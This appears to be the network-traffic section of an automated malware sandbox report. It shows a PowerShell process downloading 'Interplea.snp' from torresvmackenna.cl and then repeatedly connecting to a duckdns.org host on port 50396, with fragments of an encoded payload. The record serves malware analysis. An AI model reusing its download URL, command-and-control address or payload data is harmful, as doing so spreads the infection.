Oct 31, 2024 04:02:42.995558023 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:42.995990992 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:42.996046066 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:42.996165037 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:42.996218920 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:42.996356964 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:42.996407032 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.047189951 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.047255039 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.047415018 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.047463894 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.047749043 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.047817945 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.048063993 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.048116922 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.048418045 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.048474073 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.048681021 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.048739910 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.051949024 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.052032948 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.109781981 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.109879017 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.172435999 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
Oct 31, 2024 04:02:43.172503948 CET | 49401 | 443 | 192.168.2.5 | 200.6.118.162
Oct 31, 2024 04:02:43.172702074 CET | 443 | 49401 | 200.6.118.162 | 192.168.2.5
                                                                Oct 31, 2024 04:02:43.172755957 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.183958054 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184016943 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184184074 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184240103 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184338093 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184391975 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184509993 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184562922 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184669971 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184725046 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.231446028 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.231519938 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297027111 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297099113 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297425985 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297481060 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297787905 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297852039 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298049927 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298104048 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298293114 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298351049 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298489094 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298571110 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298748016 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298809052 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.342852116 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.342930079 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.422283888 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.422358990 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.422982931 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423038960 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423048973 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423078060 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423176050 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423185110 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423194885 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423399925 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:45.985011101 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.989792109 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:45.989870071 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.993171930 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.997947931 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:54.472302914 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:54.472407103 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:54.472582102 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:54.477354050 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:55.515659094 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.522368908 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:55.522445917 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.528388977 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.535419941 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:04.014192104 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:04.014343977 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:04.014456987 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:04.019270897 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:05.018584013 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.023588896 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:05.023722887 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.027204037 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.032088995 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:13.513582945 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:13.513777018 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:13.513940096 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:13.518750906 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:14.518964052 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.523952961 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:14.524049997 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.527569056 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.532392025 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:23.019743919 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:23.019864082 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:23.019942045 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:23.024830103 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:24.034219027 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.039134979 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:24.039279938 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.042543888 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.047396898 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:32.520462990 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:32.520591021 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:32.520698071 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:32.525542021 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:33.534213066 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.539383888 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:33.539524078 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.542753935 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.547636986 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:42.021429062 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:42.021521091 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:42.021579981 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:42.026468039 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:43.034140110 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.039310932 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:43.039424896 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.042253017 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.047085047 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:51.521588087 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:51.521790028 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:51.521888018 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:51.527384996 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:53.142952919 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.147871971 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:53.150655985 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.164020061 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.169039965 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.145845890 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.145927906 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.145982027 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.146153927 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.146229982 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.146497011 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.146544933 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.151015043 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:03.159282923 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.164338112 CET5039649544185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:03.164431095 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.168016911 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.172887087 CET5039649544185.236.203.101192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 04:02:00.538244963 CET | 49455 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 04:02:00.994132996 CET | 53 | 49455 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 04:02:17.883763075 CET | 53 | 52994 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 04:02:20.539830923 CET | 53 | 52543 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 04:02:44.541675091 CET | 59095 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 04:02:45.585501909 CET | 59095 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 04:02:45.979222059 CET | 53 | 59095 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 04:02:45.979245901 CET | 53 | 59095 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 04:03:52.533951044 CET | 63377 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 04:03:53.137340069 CET | 53 | 63377 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 04:02:00.538244963 CET | 192.168.2.5 | 1.1.1.1 | 0x7d9d | Standard query (0) | torresvmackenna.cl | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:44.541675091 CET | 192.168.2.5 | 1.1.1.1 | 0x7f37 | Standard query (0) | fumecexpsales1international.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:45.585501909 CET | 192.168.2.5 | 1.1.1.1 | 0x7f37 | Standard query (0) | fumecexpsales1international.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:03:52.533951044 CET | 192.168.2.5 | 1.1.1.1 | 0x6c3b | Standard query (0) | fumecexpsales1international.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 04:01:55.447365046 CET | 1.1.1.1 | 192.168.2.5 | 0x4f5f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:01:55.447365046 CET | 1.1.1.1 | 192.168.2.5 | 0x4f5f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:00.994132996 CET | 1.1.1.1 | 192.168.2.5 | 0x7d9d | No error (0) | torresvmackenna.cl | | 200.6.118.162 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:13.141521931 CET | 1.1.1.1 | 192.168.2.5 | 0x5643 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:13.141521931 CET | 1.1.1.1 | 192.168.2.5 | 0x5643 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:45.979222059 CET | 1.1.1.1 | 192.168.2.5 | 0x7f37 | No error (0) | fumecexpsales1international.duckdns.org | | 185.236.203.101 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:02:45.979245901 CET | 1.1.1.1 | 192.168.2.5 | 0x7f37 | No error (0) | fumecexpsales1international.duckdns.org | | 185.236.203.101 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 04:03:53.137340069 CET | 1.1.1.1 | 192.168.2.5 | 0x6c3b | No error (0) | fumecexpsales1international.duckdns.org | | 185.236.203.101 | A (IP address) | IN (0x0001) | false
                                                                • torresvmackenna.cl
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 200.6.118.162 | 443 | 576 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 03:02:02 UTC | 179 | OUT | GET /bin/Interplea.snp HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: torresvmackenna.cl
                                                                Connection: Keep-Alive
2024-10-31 03:02:02 UTC | 422 | IN | HTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 03:02:02 GMT
                                                                Server: Apache
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                X-Frame-Options: sameorigin
                                                                Last-Modified: Wed, 30 Oct 2024 22:04:36 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440056
                                                                Referrer-Policy: no-referrer
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close
                                                                2024-10-31 03:02:02 UTC7770INData Raw: 36 77 4c 4c 47 65 73 43 74 44 75 37 35 67 34 65 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 69 34 57 75 58 36 38 71 72 4e 78 41 5a 76 72 41 72 4d 32 67 66 47 57 55 32 34 7a 36 77 4a 67 74 4f 73 43 36 61 75 42 38 65 6a 76 78 49 44 72 41 6c 69 63 36 77 49 43 4f 75 73 43 66 55 35 78 41 5a 75 36 77 61 55 58 33 65 73 43 43 4f 7a 72 41 74 49 71 36 77 4b 6c 51 2b 73 43 2b 32 6f 78 79 75 73 43 33 66 62 72 41 72 50 31 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 69 6e 34 63 51 47 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6e 61 67 37 41 44 66 4d 74 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 50 72 41 67 56 34 63 51 47 62 67 63 4d 76 6f 70 34 43 63 51 47 62 63 51 47 62 75 6f 70 73 44 6c 6a 72 41 68 2b 50 36 77 4a
                                                                Data Ascii: 6wLLGesCtDu75g4eAHEBm3EBmwNcJARxAZvrAi4WuX68qrNxAZvrArM2gfGWU24z6wJgtOsC6auB8ejvxIDrAlic6wICOusCfU5xAZu6waUX3esCCOzrAtIq6wKlQ+sC+2oxyusC3fbrArP1iRQLcQGbcQGb0eLrAin4cQGbg8EEcQGbcQGbgfnag7ADfMtxAZtxAZuLRCQEcQGbcQGbicPrAgV4cQGbgcMvop4CcQGbcQGbuopsDljrAh+P6wJ
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 75 4c 43 64 4d 6e 52 4c 6a 69 61 4b 6f 62 2b 43 62 77 38 51 38 78 32 51 58 4e 47 49 38 4e 73 66 63 5a 7a 59 43 37 7a 76 6a 71 6d 37 73 59 4b 70 51 65 6a 6c 31 76 4a 33 56 46 53 2f 4e 38 52 4f 46 53 6a 6e 56 39 35 6a 38 78 51 77 4d 42 46 52 58 56 76 44 79 2f 71 30 64 75 50 43 72 4e 65 75 55 65 6d 44 36 37 4b 48 37 55 6e 6f 74 72 30 74 63 5a 6e 62 66 64 39 63 6a 73 64 68 42 65 31 6a 55 30 6c 4f 30 31 74 30 4f 31 79 67 4c 6e 6a 30 67 47 44 33 67 75 59 77 67 53 59 65 38 6b 5a 35 77 69 62 35 64 67 71 66 36 2b 50 58 51 4a 50 51 32 4c 69 6f 66 49 41 67 38 4d 75 44 7a 55 2f 41 62 4f 39 71 4f 36 65 79 56 38 4a 79 59 79 49 47 71 6b 41 33 4c 4b 6e 4a 6c 35 58 69 49 4c 69 6a 36 50 46 6a 32 48 4c 61 69 50 74 6b 59 39 67 66 39 61 6d 58 77 47 37 49 62 59 74 37 64 37 55
                                                                Data Ascii: uLCdMnRLjiaKob+Cbw8Q8x2QXNGI8NsfcZzYC7zvjqm7sYKpQejl1vJ3VFS/N8ROFSjnV95j8xQwMBFRXVvDy/q0duPCrNeuUemD67KH7Unotr0tcZnbfd9cjsdhBe1jU0lO01t0O1ygLnj0gGD3guYwgSYe8kZ5wib5dgqf6+PXQJPQ2LiofIAg8MuDzU/AbO9qO6eyV8JyYyIGqkA3LKnJl5XiILij6PFj2HLaiPtkY9gf9amXwG7IbYt7d7U
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 59 6d 42 7a 2f 4c 51 6f 61 31 63 6a 74 74 59 39 67 33 64 62 67 36 74 66 79 37 44 54 49 50 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 73 74 5a 32 77 43 4f 44 35 68 35 33 33 41 54 6d 35 4a 2b 50 42 4b 68 4e 2b 4d 39 51 49 71 30 58 53 36 51 71 50 5a 5a 41 48 50 37 67 51 2b 30 79 67 49 50 74 4d 6f 43 44 37 54 4b 78 61 4a 48 61 69 65 69 38 64 52 78 6a 34 33 4f 31 52 68 70 6b 45 50 69 44 4f 63 30 63 59 4e 75 56 62 41 67 4d 46 6f 79 4e 54 31 53 59 4d 79 70 67 38 68 43 43 74 32 75 50 66 30 61 53 43 68 56 77 72 58 50 78 50 4d 6a 41 48 45 65 78 64 63 6e 42 4b 6a 63 77 33 49 6a 44 45 59 6b 36 75 2b 58 70 66 69 4c 32 77 75 77 2f 42 38 54 4f 53 41 4a 6f 67 48 54 55 64 39 51 67 63 62 79 34 4c 54 46 41 68 6e 6c 79 67 49 50 74 4d 6f 43 44 37 54 4b 41 67 39 33 79 35 6d 47 49
                                                                Data Ascii: YmBz/LQoa1cjttY9g3dbg6tfy7DTIPtMoCD7TKAg+0ystZ2wCOD5h533ATm5J+PBKhN+M9QIq0XS6QqPZZAHP7gQ+0ygIPtMoCD7TKxaJHaiei8dRxj43O1RhpkEPiDOc0cYNuVbAgMFoyNT1SYMypg8hCCt2uPf0aSChVwrXPxPMjAHEexdcnBKjcw3IjDEYk6u+XpfiL2wuw/B8TOSAJogHTUd9Qgcby4LTFAhnlygIPtMoCD7TKAg93y5mGI
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 51 6e 6c 2f 31 4c 37 65 6c 4f 51 39 32 4f 51 30 4a 79 59 50 74 4c 39 64 4b 38 52 59 39 63 4b 45 50 68 44 6f 39 58 4f 2f 44 46 34 31 63 6e 4e 4d 6b 4b 54 37 61 43 41 33 51 61 5a 62 66 66 31 62 4a 55 72 4d 79 46 6b 55 55 73 67 4f 51 64 49 42 36 4f 6a 63 44 33 2f 61 31 4d 4c 49 30 34 44 31 49 71 39 74 5a 51 50 39 47 73 6c 4d 49 34 64 55 72 2f 34 4f 2f 7a 32 31 41 39 54 32 73 4e 74 4d 72 4f 71 33 69 4b 54 6b 45 2b 2f 73 66 4e 74 41 43 59 47 50 45 4e 4f 4f 42 50 35 58 51 52 50 61 70 68 79 45 31 71 39 50 58 77 39 4a 38 58 50 54 70 53 68 44 47 6a 41 41 2b 30 6d 4c 68 4e 70 32 4e 51 6a 6c 34 4d 4f 77 71 70 53 2f 44 51 45 6f 6a 42 6a 6b 5a 70 66 4f 35 43 6e 5a 36 47 55 38 4d 56 6b 6a 45 7a 66 67 68 73 44 39 63 46 45 30 54 50 77 62 47 46 73 73 4d 4b 47 38 6f 52 2b
                                                                Data Ascii: Qnl/1L7elOQ92OQ0JyYPtL9dK8RY9cKEPhDo9XO/DF41cnNMkKT7aCA3QaZbff1bJUrMyFkUUsgOQdIB6OjcD3/a1MLI04D1Iq9tZQP9GslMI4dUr/4O/z21A9T2sNtMrOq3iKTkE+/sfNtACYGPENOOBP5XQRPaphyE1q9PXw9J8XPTpShDGjAA+0mLhNp2NQjl4MOwqpS/DQEojBjkZpfO5CnZ6GU8MVkjEzfghsD9cFE0TPwbGFssMKG8oR+
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 76 77 32 58 48 62 65 34 35 47 70 45 79 4f 52 6b 76 41 48 74 4a 6e 6f 56 77 6f 51 2b 45 47 70 31 63 36 33 38 50 4f 55 65 6a 49 39 61 7a 43 2f 2b 73 67 75 67 37 64 44 2f 5a 6c 67 42 2b 43 72 46 78 70 4e 68 72 70 67 72 6e 53 54 39 46 55 4d 44 35 59 68 69 47 68 41 41 2b 30 6e 4c 77 61 68 2b 69 36 6a 6c 72 42 63 55 67 45 53 2f 51 4f 51 78 41 46 68 6f 70 42 73 6a 4c 78 70 42 70 32 4d 38 4d 6b 34 49 5a 68 2b 66 37 6c 54 70 68 77 39 46 6e 45 64 70 58 53 6f 2b 4e 45 6c 4c 69 2b 30 61 2b 43 6a 6b 62 74 4f 6c 71 52 53 2f 43 68 6c 56 49 67 6a 6c 37 79 57 71 63 7a 79 39 57 45 49 61 45 41 44 37 53 62 75 31 78 67 6b 55 43 4f 52 57 73 74 55 37 74 4c 38 2f 31 4f 7a 55 39 59 4b 45 50 6c 44 72 74 58 5a 44 5a 38 73 42 4c 70 6c 61 6d 73 6e 54 44 77 49 46 30 32 49 76 53 48 64
                                                                Data Ascii: vw2XHbe45GpEyORkvAHtJnoVwoQ+EGp1c638POUejI9azC/+sgug7dD/ZlgB+CrFxpNhrpgrnST9FUMD5YhiGhAA+0nLwah+i6jlrBcUgES/QOQxAFhopBsjLxpBp2M8Mk4IZh+f7lTphw9FnEdpXSo+NElLi+0a+CjkbtOlqRS/ChlVIgjl7yWqczy9WEIaEAD7Sbu1xgkUCORWstU7tL8/1OzU9YKEPlDrtXZDZ8sBLplamsnTDwIF02IvSHd
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 4e 4b 6a 4d 78 4e 4d 73 65 70 69 54 73 32 6d 4a 49 6f 41 4c 58 64 6e 77 2b 30 79 67 49 50 74 4d 6f 43 44 37 54 4b 78 54 4c 38 50 32 79 45 4e 43 4e 49 50 58 54 64 39 58 6c 56 6c 50 75 6f 72 4b 4c 54 45 31 45 59 67 77 75 51 4e 69 2f 73 2b 5a 71 36 4b 66 59 4b 6b 7a 71 6f 45 55 58 2f 6d 66 43 61 69 4e 57 62 6e 6f 5a 56 79 77 4f 53 4d 42 6c 35 4c 53 7a 2f 6f 51 62 32 52 72 4a 56 4a 4c 6f 4b 53 33 6f 4a 75 4c 47 48 30 47 6d 56 62 2b 39 38 45 4c 58 62 6b 64 43 35 56 70 43 66 76 4b 4e 69 36 34 77 4a 57 7a 4e 35 6b 6f 4d 37 6b 4a 2b 56 71 73 48 46 42 4a 42 58 79 67 49 50 74 4d 6f 43 44 37 54 4b 41 67 39 68 6d 5a 76 65 4d 42 4c 39 52 73 62 59 76 65 61 67 5a 34 31 64 36 31 41 32 79 6f 4b 2b 4e 78 58 73 31 69 35 63 30 43 75 38 4d 54 4e 4c 42 69 76 62 36 4a 43 6c 65
                                                                Data Ascii: NKjMxNMsepiTs2mJIoALXdnw+0ygIPtMoCD7TKxTL8P2yENCNIPXTd9XlVlPuorKLTE1EYgwuQNi/s+Zq6KfYKkzqoEUX/mfCaiNWbnoZVywOSMBl5LSz/oQb2RrJVJLoKS3oJuLGH0GmVb+98ELXbkdC5VpCfvKNi64wJWzN5koM7kJ+VqsHFBJBXygIPtMoCD7TKAg9hmZveMBL9RsbYveagZ41d61A2yoK+NxXs1i5c0Cu8MTNLBivb6JCle
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 6f 43 68 6e 4f 64 69 62 4a 6f 79 77 49 50 30 73 58 46 4f 4c 54 4b 41 67 2b 30 79 67 49 50 74 4d 6f 43 78 32 71 75 34 4a 54 78 34 51 74 35 67 70 76 6f 4b 5a 74 47 69 39 59 32 6c 73 2f 43 46 35 41 49 47 33 33 5a 39 31 62 75 51 37 39 73 74 73 6f 43 58 67 32 48 54 45 58 2b 53 2f 50 70 69 66 52 31 6a 6b 55 43 69 69 4d 43 53 2f 4e 4f 6e 38 47 71 6a 6c 31 74 6f 56 79 58 51 7a 50 50 59 6d 65 31 72 41 6d 39 62 63 4c 78 4b 65 6b 6d 53 56 36 35 39 56 38 77 32 69 6b 43 6b 34 76 51 75 38 73 54 32 4c 54 4b 41 67 2b 30 79 67 49 50 74 4d 6f 43 77 53 7a 52 68 45 4f 70 71 78 44 42 4d 77 67 35 79 61 46 34 41 39 56 2b 48 67 43 57 34 4e 37 47 54 2b 53 49 4a 6c 69 37 79 7a 4c 48 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 67 4c 41 65 73 6c 47 68 59 52 4d 47 31 70 71 6c 77 58 54 72
